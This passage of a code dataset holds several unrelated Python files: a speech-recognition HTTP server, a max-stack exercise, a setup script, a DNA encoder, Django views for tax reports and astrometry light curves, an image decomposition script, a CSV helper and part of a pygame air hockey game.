soundfile as sf\n # audio, sr1 = sf.read(data, dtype='float32')\n open(output_file_pre + part1 + \".wav\", \"wb\").write(data.read())\n\n # create_desc_json.ai_2_word_single(output_file_pre + part1 + \".wav\")\n trans_res = otherNet.getTrans(output_file_pre + part1 + \".wav\")\n content = bytes(u\"没有检测到语音,请重新录制\".encode(\"utf-8\"))\n if trans_res:\n content = bytes(trans_res.encode(\"utf-8\"))\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain; charset=utf-8\")\n self.send_header(\"Content-Length\", len(content))\n self.end_headers()\n self.wfile.write(content)\n\n\ndef load_model(args):\n # load model from model_name prefix and epoch of model_num_epoch with gpu contexts of contexts\n is_start_from_batch = args.config.getboolean('load', 'is_start_from_batch')\n\n from importlib import import_module\n symbol_template = import_module(args.config.get('arch', 'arch_file'))\n\n model_file = args.config.get('common', 'model_file')\n model_name = os.path.splitext(model_file)[0]\n model_num_epoch = int(model_name[-4:])\n\n model_path = 'checkpoints/' + str(model_name[:-5])\n\n bucketing_arch = symbol_template.BucketingArch(args)\n model_loaded = bucketing_arch.get_sym_gen()\n\n return model_loaded, model_num_epoch, model_path\n\n\nclass Net(object):\n def __init__(self):\n if len(sys.argv) <= 1:\n raise Exception('cfg file path must be provided. ' +\n 'ex)python main.py --configfile examplecfg.cfg')\n self.args = parse_args(sys.argv[1])\n # set parameters from cfg file\n # give random seed\n self.random_seed = self.args.config.getint('common', 'random_seed')\n self.mx_random_seed = self.args.config.getint('common', 'mx_random_seed')\n # random seed for shuffling data list\n if self.random_seed != -1:\n np.random.seed(self.random_seed)\n # set mx.random.seed to give seed for parameter initialization\n if self.mx_random_seed != -1:\n mx.random.seed(self.mx_random_seed)\n else:\n mx.random.seed(hash(datetime.now()))\n # set log file name\n self.log_filename = self.args.config.get('common', 'log_filename')\n self.log = LogUtil(filename=self.log_filename).getlogger()\n\n # set parameters from data section(common)\n self.mode = self.args.config.get('common', 'mode')\n\n save_dir = 'checkpoints'\n model_name = self.args.config.get('common', 'prefix')\n max_freq = self.args.config.getint('data', 'max_freq')\n self.datagen = DataGenerator(save_dir=save_dir, model_name=model_name, max_freq=max_freq)\n self.datagen.get_meta_from_file(\n np.loadtxt(generate_file_path(save_dir, model_name, 'feats_mean')),\n np.loadtxt(generate_file_path(save_dir, model_name, 'feats_std')))\n\n self.buckets = json.loads(self.args.config.get('arch', 'buckets'))\n\n # get meta file where character to number conversions are defined\n\n self.contexts = parse_contexts(self.args)\n self.num_gpu = len(self.contexts)\n self.batch_size = self.args.config.getint('common', 'batch_size')\n # check the number of gpus is positive divisor of the batch size for data parallel\n self.is_batchnorm = self.args.config.getboolean('arch', 'is_batchnorm')\n self.is_bucketing = self.args.config.getboolean('arch', 'is_bucketing')\n\n # log current config\n self.config_logger = ConfigLogger(self.log)\n self.config_logger(self.args.config)\n\n default_bucket_key = 1600\n self.args.config.set('arch', 'max_t_count', str(default_bucket_key))\n self.args.config.set('arch', 'max_label_length', str(95))\n self.labelUtil = LabelUtil()\n is_bi_graphemes = self.args.config.getboolean('common', 'is_bi_graphemes')\n load_labelutil(self.labelUtil, is_bi_graphemes, language=\"zh\")\n self.args.config.set('arch', 'n_classes', str(self.labelUtil.get_count()))\n self.max_t_count = self.args.config.getint('arch', 'max_t_count')\n # self.load_optimizer_states = self.args.config.getboolean('load', 'load_optimizer_states')\n\n # load model\n self.model_loaded, self.model_num_epoch, self.model_path = load_model(self.args)\n\n # self.model = STTBucketingModule(\n # sym_gen=self.model_loaded,\n # default_bucket_key=default_bucket_key,\n # context=self.contexts\n # )\n\n from importlib import import_module\n prepare_data_template = import_module(self.args.config.get('arch', 'arch_file'))\n init_states = prepare_data_template.prepare_data(self.args)\n width = self.args.config.getint('data', 'width')\n height = self.args.config.getint('data', 'height')\n for bucket in self.buckets:\n net, init_state_names, ll = self.model_loaded(bucket)\n net.save('checkpoints/%s-symbol.json' % bucket)\n input_shapes = dict([('data', (self.batch_size, default_bucket_key, width * height))] + init_states + [('label',(1,18))])\n # self.executor = net.simple_bind(ctx=mx.cpu(), **input_shapes)\n\n # self.model.bind(data_shapes=[('data', (self.batch_size, default_bucket_key, width * height))] + init_states,\n # label_shapes=[\n # ('label', (self.batch_size, self.args.config.getint('arch', 'max_label_length')))],\n # for_training=True)\n\n symbol, self.arg_params, self.aux_params = mx.model.load_checkpoint(self.model_path, self.model_num_epoch)\n all_layers = symbol.get_internals()\n concat = all_layers['concat36457_output']\n sm = mx.sym.SoftmaxOutput(data=concat, name='softmax')\n self.executor = sm.simple_bind(ctx=mx.cpu(), **input_shapes)\n # self.model.set_params(self.arg_params, self.aux_params, allow_extra=True, allow_missing=True)\n\n for key in self.executor.arg_dict.keys():\n if key in self.arg_params:\n self.arg_params[key].copyto(self.executor.arg_dict[key])\n init_state_names.remove('data')\n init_state_names.sort()\n self.states_dict = dict(zip(init_state_names, self.executor.outputs[1:]))\n self.input_arr = mx.nd.zeros((self.batch_size, default_bucket_key, width * height))\n\n try:\n from swig_wrapper import Scorer\n\n vocab_list = [chars.encode(\"utf-8\") for chars in self.labelUtil.byList]\n self.log.info(\"vacab_list len is %d\" % len(vocab_list))\n _ext_scorer = Scorer(0.26, 0.1, self.args.config.get('common', 'kenlm'), vocab_list)\n lm_char_based = _ext_scorer.is_character_based()\n lm_max_order = _ext_scorer.get_max_order()\n lm_dict_size = _ext_scorer.get_dict_size()\n self.log.info(\"language model: \"\n \"is_character_based = %d,\" % lm_char_based +\n \" max_order = %d,\" % lm_max_order +\n \" dict_size = %d\" % lm_dict_size)\n self.eval_metric = EvalSTTMetric(batch_size=self.batch_size, num_gpu=self.num_gpu, is_logging=True,\n scorer=_ext_scorer)\n except ImportError:\n import kenlm\n km = kenlm.Model(self.args.config.get('common', 'kenlm'))\n self.eval_metric = EvalSTTMetric(batch_size=self.batch_size, num_gpu=self.num_gpu, is_logging=True,\n scorer=km.score)\n\n def forward(self, input_data, new_seq=False):\n if new_seq == True:\n for key in self.states_dict.keys():\n self.executor.arg_dict[key][:] = 0.\n input_data.copyto(self.executor.arg_dict[\"data\"])\n self.executor.forward()\n for key in self.states_dict.keys():\n self.states_dict[key].copyto(self.executor.arg_dict[key])\n prob = self.executor.outputs[0].asnumpy()\n return prob\n\n def getTrans(self, wav_file):\n res = spectrogram_from_file(wav_file, noise_percent=0)\n buck = bisect.bisect_left(self.buckets, len(res))\n bucket_key = 1600\n res = self.datagen.normalize(res)\n d = np.zeros((self.batch_size, bucket_key, res.shape[1]))\n d[0, :res.shape[0], :] = res\n st = time.time()\n # model_loaded.forward(data_batch, is_train=False)\n probs = self.forward(mx.nd.array(d))\n from stt_metric import ctc_greedy_decode\n res = ctc_greedy_decode(probs, self.labelUtil.byList)\n self.log.info(\"forward cost %.2f, %s\" % (time.time() - st, res))\n st = time.time()\n # model_loaded.update_metric(self.eval_metric, data_batch.label)\n self.log.info(\"upate metric cost %.2f\" % (time.time() - st))\n # print(\"my res is:\")\n # print(eval_metric.placeholder)\n return self.eval_metric.placeholder\n\n\notherNet = Net()\n\nif __name__ == '__main__':\n server = HTTPServer(('', 8089), SimpleHTTPRequestHandler)\n print('Started httpserver on port')\n\n # Wait forever for incoming htto requests\n server.serve_forever()\n","sub_path":"server3.py","file_name":"server3.py","file_ext":"py","file_size_in_byte":11707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"233951496","text":"# track the largest item during insertion\n# the get_max operation needs to be O(1) running time\n# the memory complexity can be O(N) which means we can use another stack\n# in the implementation\n\nclass Stack:\n def __init__(self):\n self.stack = []\n self.max_stack = []\n\n def push(self, data):\n self.stack.append(data)\n\n if (len(self.stack) == 1):\n self.max_stack.append(data)\n return\n\n if (data > self.max_stack[-1]):\n self.max_stack.append(data)\n else:\n # if it's not the largest in the stack, we can duplicate the largest one into the max_stack\n self.max_stack.append(self.max_stack[-1])\n\n return self.stack\n \n def pop(self):\n last_item = self.stack[-1]\n del self.stack[-1]\n return last_item\n\n def stack_size(self):\n return len(self.stack)\n\n def get_max(self):\n # O(1)\n return self.max_stack[-1]\n\nstack = Stack()\n\nstack.push(10)\nstack.push(5)\nstack.push(1)\nstack.push(122)\nstack.push(100)\nprint('stack size %d' % stack.stack_size())\n\nprint('max: %d' % stack.get_max())\n\n\n\n\n ","sub_path":"stacks/python/3_max_stack.py","file_name":"3_max_stack.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"72142278","text":"from setuptools import setup, find_packages\nfrom os import path\nfrom setuptools.extension import Extension\nfrom Cython.Build import cythonize\n\n\nhere = path.abspath(path.dirname(__file__))\n\n\nsetup(\n name = \"strut\",\n\n version = \"0.0\",\n\n description = \"STRUctural Toolkit\",\n\n author = \"H. Onur Solmaz\",\n\n author_email = \"onursolmaz@gmail.com\",\n\n packages = find_packages(exclude=[\"contrib\", \"docs\", \"tests\"]),\n\n extras_require = {\n \"dev\": [\"check-manifest\"],\n \"test\": [\"coverage\"],\n },\n\n # package_data={\n # \"sample\": [\"package_data.dat\"],\n # },\n\n # data_files=[(\"my_data\")],\n\n install_requires = {\n \"numpy\",\n \"scipy\",\n \"python-dateutil\",\n \"meshpy\",\n \"bs4\",\n # \"xmltodict\",\n },\n\n ext_modules = cythonize(\"strut/material_cython.pyx\"),\n\n entry_points = {\n \"console_scripts\": [\n \"moment_curvature_graph=strut.bin.moment_curvature_graph:__main__\",\n \"moment_force_graph=strut.bin.moment_force_graph:__main__\",\n ],\n },\n)\n\n\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"591338444","text":"\ndef reverse(encoding):\n revEncoding = {value: key for key, value in encoding.items()}\n return revEncoding\n\ndef encode(sequence):\n #Create an empty string for the encoding of the sequence\n encoded_string = ''\n\n #For each letter, append its encoding to the encoded string\n for letter in range(len(sequence)):\n encoded_string += encoding[sequence[letter]]\n return encoded_string\n\ndef decode(encoding):\n decoded = ''\n index = 0\n while index + 1 < len(encoding):\n if index + 2 <= len(encoding):\n if encoding[index: index + 2] in revEncoding:\n print('if 2', index)\n decoded += revEncoding[encoding[index: index +2]]\n index += 2\n if index + 1 <= len(encoding):\n if encoding[index: index + 1] in revEncoding:\n print('if 1', index)\n decoded += revEncoding[encoding[index: index +1]]\n index += 1\n return decoded\n\ndef combinations(seq):\n if len(seq) % 2 == 1:\n pairs = int((len(seq)/2) + 0.5)\n else:\n pairs = int((len(seq)/2))\n\n\n\nencoding = {'C' : '1', 'G' : '0', 'A' : '00', 'T': '01'}\nrevEncoding = reverse(encoding)\n\nprint(revEncoding)\nseq = encode('gataca'.upper())\nprint(seq)\nprint(decode(seq))\n","sub_path":"dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"237845242","text":"from django.http import HttpResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\n\nfrom django.conf import settings\n\nfrom . import config\nfrom util import date_utils, csv_utils, mail_utils\nfrom clients import lynx_db_client\n\nlynx_client = lynx_db_client.client()\n\n\n@api_view(['POST'])\ndef update_weekly_tds_report_ad(request):\n weekly_tds = lynx_client.fetch_weekly_tds_data()\n weekly_tds_data = [\n {\"SellerIds\": data[0], \"NEFTIds\": data[1], \"SettlementAmount\": data[2], \"SettlementDate\": data[3],\n \"SettlementStatus\": data[4]} for data in weekly_tds]\n file_name = 'Weekly_tds_payout_from_%s_to_%s.csv' % (\n date_utils.get_previous_date(8), date_utils.get_previous_date(1))\n csv_utils.create_csv_from_list(config.tds_weekly_report_header, weekly_tds_data, file_name)\n mail_utils.send_mail_with_attachment(settings.TDS_TO_EMAIL,\n config.tds_weekly_report_subject % (\n date_utils.get_previous_date(8),\n date_utils.get_previous_date(1)),\n config.tds_weekly_report_mail_template,\n file_name)\n return HttpResponse(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"sp-ssm-hercules/tds/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"403692540","text":"from django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render_to_response\nfrom django.template import RequestContext\nfrom django.utils.dateparse import parse_datetime\n\nfrom astrometry.util import create_new_lightcurve\n\nfrom astrometry.models import AstrometrySubmission, AstrometrySubmissionJob\nfrom imageflow.models import ImageAnalysis, ImageFilter, Reduction, UserUploadedImage\n\ndef index(request):\n return render_to_response('index.html', context_instance=RequestContext(request))\n\ndef upload_image(request):\n if request.user.is_authenticated():\n if request.method == 'POST':\n imgs = [request.FILES[key] for key in request.FILES]\n lightcurve = create_new_lightcurve(request.user, imgs)\n\n # Redirect to submission viewing page.\n return JsonResponse({\n 'details': 'success',\n 'redirect_url': reverse('edit_lightcurve', kwargs={'lightcurve_id': lightcurve.id}),\n })\n\n return render_to_response('upload_image.html', {},\n context_instance=RequestContext(request))\n else:\n return HttpResponseRedirect(reverse('login'))\n\ndef astrometry(request, subid):\n # TODO(ian): Look up submission and view status.\n # TODO(ian): Handle failed Analysis Result.\n try:\n result = ImageAnalysis.objects.exclude( \\\n status=ImageAnalysis.PENDING).get( \\\n astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n 'image_filters': ImageFilter.objects.all(),\n }\n return render_to_response('submission.html', template_args,\n context_instance=RequestContext(request))\n\ndef set_datetime(request, subid):\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n\n # Set new datetime.\n try:\n parsed_dt = parse_datetime(request.POST.get('val'))\n except ValueError:\n return JsonResponse({\n 'success': False,\n 'msg': 'Invalid datetime',\n })\n\n if not parsed_dt:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not parse datetime',\n })\n\n result.image_datetime = parsed_dt\n result.save()\n\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % parsed_dt.isoformat()\n })\n\ndef set_target_point_source(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n raise Error('Could not find corresponding ImageAnalysis')\n\n analysis.target_id = request.POST.get('val')\n analysis.save()\n return JsonResponse({\n 'success': True,\n })\n\ndef set_filter_band(request, subid):\n analysis, filter_band = resolve_band(request, subid)\n analysis.image_filter = filter_band\n analysis.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % str(filter_band)\n })\n\ndef set_color_index_1(request, subid):\n analysis, filter_band = resolve_band(request, subid)\n analysis.get_or_create_reduction()\n analysis.reduction.color_index_1 = filter_band\n analysis.reduction.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % str(filter_band)\n })\n\ndef set_color_index_2(request, subid):\n analysis, filter_band = resolve_band(request, subid)\n analysis.get_or_create_reduction()\n analysis.reduction.color_index_2 = filter_band\n analysis.reduction.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input to %s' % str(filter_band)\n })\n\ndef set_image_companion(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n raise Error('Could not find corresponding ImageAnalysis')\n analysis.get_or_create_reduction()\n\n imageid = request.POST.get('val')\n analysis.reduction.image_companion = UserUploadedImage.objects.get(pk=imageid)\n analysis.reduction.save()\n return JsonResponse({\n 'success': True,\n 'msg': 'Resolved input'\n })\n\ndef resolve_band(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n raise Error('Could not find corresponding ImageAnalysis')\n\n band = request.POST.get('val')\n if not band:\n raise Error('Filter band not specified')\n\n try:\n filter_band = ImageFilter.objects.get(band=band)\n except ObjectDoesNotExist:\n raise Error('Invalid filter band')\n\n return analysis, filter_band\n\ndef set_elevation(request, subid):\n return set_float(request, subid, 'image_elevation')\n\ndef set_latitude(request, subid):\n return set_float(request, subid, 'image_latitude')\n\ndef set_longitude(request, subid):\n return set_float(request, subid, 'image_longitude')\n\ndef set_second_order_extinction(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n analysis.get_or_create_reduction()\n return set_float(request, subid, 'second_order_extinction', on_reduction=True)\n\ndef set_float(request, subid, attrname, on_reduction=False):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n\n try:\n val = float(request.POST.get('val'))\n except ValueError:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not parse as float',\n })\n\n if on_reduction:\n setattr(analysis.reduction, attrname, val)\n analysis.reduction.save()\n else:\n setattr(analysis, attrname, val)\n analysis.save()\n\n return JsonResponse({\n 'success': True,\n })\n\ndef set_reduction_status(request, subid):\n # TODO(ian): Verify owner of reduction for all these ImageAnalysis fetches.\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n reduction = analysis.get_or_create_reduction()\n reduction.status = Reduction.PENDING\n reduction.save()\n return JsonResponse({\n 'success': True,\n 'message': 'Reduction status set to pending',\n })\n\ndef get_reduction_status(request, subid):\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'msg': 'Could not find corresponding ImageAnalysis',\n })\n reduction = analysis.get_or_create_reduction()\n return JsonResponse({\n 'success': True,\n 'status': reduction.status,\n })\n\ndef point_sources(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n }\n return render_to_response('point_sources.html', template_args,\n context_instance=RequestContext(request))\n\ndef reference_stars(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n 'image_filters': ImageFilter.objects.all(),\n }\n return render_to_response('reference_stars.html', template_args,\n context_instance=RequestContext(request))\n\ndef reduction(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n analysis = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n # Other images in this light curve.\n image_companions = analysis.lightcurve.useruploadedimage_set.all()\n\n template_args = {\n 'result': analysis.get_summary_obj(),\n 'image_filters': ImageFilter.objects.all(),\n\n 'image_companions': image_companions,\n }\n if hasattr(analysis, 'reduction') and analysis.reduction:\n template_args.update({\n 'reduction': analysis.reduction.get_summary_obj(),\n })\n return render_to_response('reduction.html', template_args,\n context_instance=RequestContext(request))\n else:\n template_args.update({\n 'no_reduction': True\n })\n return render_to_response('reduction.html', template_args,\n context_instance=RequestContext(request))\n\ndef add_to_light_curve(request, subid):\n return 'not yet implemented'\n\ndef light_curve(request, subid):\n # TODO(ian): Dedup this with above code.\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return render_to_response('submission_pending.html', {},\n context_instance=RequestContext(request))\n\n template_args = {\n 'result': result.get_summary_obj(),\n }\n return render_to_response('light_curve.html', template_args,\n context_instance=RequestContext(request))\n\ndef api_get_submission_results(request, subid):\n try:\n result = ImageAnalysis.objects.exclude(status=ImageAnalysis.PENDING) \\\n .get(astrometry_job__submission__subid=subid)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'message': 'Result not found.',\n })\n\n return JsonResponse({\n 'success': True,\n 'result': result.get_summary_obj(),\n })\n","sub_path":"imageflow/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"73628360","text":"#!/usr/bin/env python\n\n# Library: pyLAR\n#\n# Copyright 2014 Kitware Inc. 28 Corporate Drive,\n# Clifton Park, NY, 12065, USA.\n#\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\" Load a given input image, and then seperate the low\nrank from the sparse (corrupted) part using Candes et al., 2011\nformulation of RPCA, solved via IALM.\n\nCAUTION: only grayscale images are supported at that point.\n\"\"\"\n\n\nimport sys\nimport numpy as np\nimport SimpleITK as sitk\nimport pyLAR.alm.ialm as ialm\nimport argparse\n\n\ndef main(argv=None):\n \"\"\"Parsing command line arguments and reading input files.\"\"\"\n if argv is None:\n argv = sys.argv\n parser = argparse.ArgumentParser(\n prog=argv[0],\n description=__doc__\n )\n parser.add_argument('-i', \"--inputImage\", required=True,\n help=\"Input image on which low-rank decomposition is computed\")\n parser.add_argument('-l', \"--lowRank\", required=True, help=\"Low-rank output image\")\n parser.add_argument('-s', \"--Sparse\", required=True,\n help=\"Sparse output image\")\n args = parser.parse_args(argv[1:])\n\n # read image\n I = sitk.ReadImage(args.inputImage)\n # data for processing\n X = sitk.GetArrayFromImage(I)\n\n # decompose X into L+S\n L, S, _, _, _, _ = ialm.recover(X)\n\n L_image = sitk.GetImageFromArray(np.asarray(L, dtype=np.uint8))\n sitk.WriteImage(L_image, args.lowRank, True)\n S_image = sitk.GetImageFromArray(np.asarray(S, dtype=np.uint8))\n sitk.WriteImage(S_image, args.Sparse, True)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_LR_one_image.py","file_name":"run_LR_one_image.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"224077762","text":"import os.path\n\n\nclass DataMover:\n FIRST_LINE_IN_DONOR = \"id,name,weight,gender,date_of_birth,last_donation,last_month_sickness,unique_identifier,expiration_of_id,blood_type,hemoblogin, email, mobile, is_valid\\n\"\n FIRST_LINE_IN_DONATION =\"id,date_of_event,start_time,end_time,zip_code,city,address,number_of_beds,planned_donor_number,final_donor_number\\n\"\n FILE_PATH = \"Data\\\\\"\n special_caracter = \"#\"\n\n def data_reader(self, file_name, start_index):\n result_list = []\n if os.path.exists(self.FILE_PATH + file_name):\n f = open(self.FILE_PATH + file_name, \"r\")\n else:\n print(\"The file is empty.\")\n self.create_file(file_name)\n return\n for line in f:\n result_list.append(self.convert_to_list(line))\n f.close()\n return result_list[start_index:]\n\n def data_writer(self, file_name, data_object, open_mode):\n if not os.path.exists(self.FILE_PATH + file_name):\n self.create_file(file_name)\n index = self.generate_id(file_name)\n with open(self.FILE_PATH + file_name, open_mode) as f:\n f.write(self.writer_converter(data_object, index))\n return\n\n def writer_converter(self, data_object, index):\n lista = \"\"\n for i in range(len(data_object)):\n if data_object[i] == \"-\":\n data_object[i] = \"no\"\n if i == 0 and not data_object[i].isdigit() and data_object[0] != \"id\":\n lista += \"{0},\".format(str(index))\n if i != len(data_object) - 1:\n if \",\" in data_object[i]:\n data_object[i] = '\"{0}\"'.format(data_object[i])\n lista += \"{0},\".format(str(data_object[i]))\n continue\n lista += \"{0},\".format(str(data_object[i]))\n else:\n if \",\" in data_object[i]:\n data_object[i] = '\"{0}\"'.format(data_object[i])\n lista += \"{0}\\n\".format(str(data_object[i]))\n continue\n lista += \"{0}\\n\".format(str(data_object[i]))\n return lista\n\n def create_file(self, file_name):\n f = open(self.FILE_PATH + file_name, \"w\")\n if file_name == \"donors.csv\":\n f.writelines(self.FIRST_LINE_IN_DONOR)\n else:\n f.writelines(self.FIRST_LINE_IN_DONATION)\n f.close()\n return\n\n def converted_reader(self, line):\n line_string = \"\"\n quotation_marks_number = 0\n result_list = \"\"\n for c in range(len(line)):\n if line[c] == '\"':\n if quotation_marks_number == 0:\n quotation_marks_number += 1\n elif quotation_marks_number == 1:\n quotation_marks_number = 0\n if line[c] == \",\" and quotation_marks_number == 1:\n line_string += self.special_caracter\n else:\n line_string += line[c]\n result_list = line_string.replace(\"\\n\",\"\").split(\",\")\n return result_list\n\n def deconverted_reader(self, data_list):\n result_list = []\n for i in range(len(data_list)):\n if self.special_caracter in str(data_list[i]):\n data_list[i] = str(data_list[i]).replace(self.special_caracter, \",\")\n result_list.append(data_list)\n return result_list\n\n def convert_to_list(self, line):\n if '\"' in line:\n result_list = self.converted_reader(line)\n result_list = self.deconverted_reader(result_list)\n else:\n result_list = line.replace(\"\\n\", \"\").split(\",\")\n return result_list\n\n def generate_id(self, file_name):\n data_list = self.data_reader(file_name, 0)\n if len(data_list) == 1:\n index = 1\n else:\n index = data_list[len(data_list)-1][0]\n index = int(index)\n index += 1\n return index\n","sub_path":"project/program_units/data_mover.py","file_name":"data_mover.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"261183400","text":"#!/usr/bin/env python2\r\n\r\nimport pygame\r\nimport sys\r\nimport os\r\nfrom pygame.locals import *\r\nfrom gameObjects import *\r\nfrom startScreen import airHockeyStart\r\n\r\n# setting logo should take place before setting the display on some OS\r\ngamelogo = pygame.image.load(os.path.join(os.path.dirname(__file__),'img/AHlogo.png'))\r\npygame.display.set_icon(gamelogo)\r\n\r\npygame.init()\r\nclock = pygame.time.Clock()\r\nscreen = pygame.display.set_mode((1200, 600))\r\n\r\n\r\n# Window title and Caption\r\npygame.display.set_caption('Air Hockey')\r\n\r\n# screen height and width\r\nheight = screen.get_height()\r\nwidth = screen.get_width()\r\n\r\n# Create Game Objects\r\npaddleVelocity = 10\r\npaddleSize = 40\r\npuckSize = 35\r\n\r\npaddle1 = Paddle(22, height / 2, paddleSize, paddleVelocity)\r\npaddle2 = Paddle(width - 20, height / 2, paddleSize, paddleVelocity)\r\n\r\n\r\ndivider = pygame.Rect(width / 2, 0, 3, height)\r\nscreenColor = (224, 214, 141)\r\n\r\n# Score\r\nscore1, score2 = 0, 0\r\n\r\nsmallfont=pygame.font.SysFont(\"comicsansms\",35)\r\nblack =(0,0,0)\r\ndef score(score1,score2):\r\n text1 =smallfont.render(\"Score1: \"+str(score1), True ,black)\r\n text2 =smallfont.render(\"Score2: \"+str(score2), True ,black)\r\n\r\n screen.blit(text1, [40,0])\r\n screen.blit(text2,[ width-150,0])\r\n\r\n\r\ndef renderPlayingArea():\r\n # Render Logic\r\n\r\n screen.fill(screenColor)\r\n\r\n # center circle\r\n pygame.draw.circle(screen, (255, 255, 255),\r\n (width / 2, height / 2), 70, 5)\r\n\r\n # borders\r\n pygame.draw.rect(screen, (255, 255, 255), (0, 0, width, height), 5)\r\n\r\n # D-box\r\n pygame.draw.rect(screen, (255, 255, 255), (0, height / 2 - 150, 150, 300), 5)\r\n pygame.draw.rect(screen, (255, 255, 255), (width -\r\n 150, height / 2 - 150, 150, 300), 5)\r\n\r\n # goals\r\n pygame.draw.rect(screen, (0, 0, 0), (0, height / 2 - 90, 5, 180))\r\n pygame.draw.rect(screen, (0, 0, 0), (width-5, height / 2 - 90, 5, 180))\r\n\r\n pygame.draw.rect(screen, (255, 255, 255), divider)\r\n\r\n\r\n# Game Loop\r\ndef gameLoop(vel):\r\n puckVelocity = [vel, vel]\r\n puck = Puck(width / 2, height / 2, puckSize, puckVelocity)\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n sys.exit()\r\n\r\n global score1, score2\r\n w, s, up, down, d, a, right, left = 0, 0, 0, 0, 0, 0, 0, 0\r\n\r\n\r\n\r\n\r\n\r\n print (\"score1: \"+str(score1))\r\n print (\"score2: \"+str(score2))\r\n # Process Player 1 Input\r\n w = pygame.key.get_pressed()[pygame.K_w]\r\n s = pygame.key.get_pressed()[pygame.K_s]\r\n d = pygame.key.get_pressed()[pygame.K_d]\r\n a = pygame.key.get_pressed()[pygame.K_a]\r\n\r\n # Process Player 2 Input\r\n 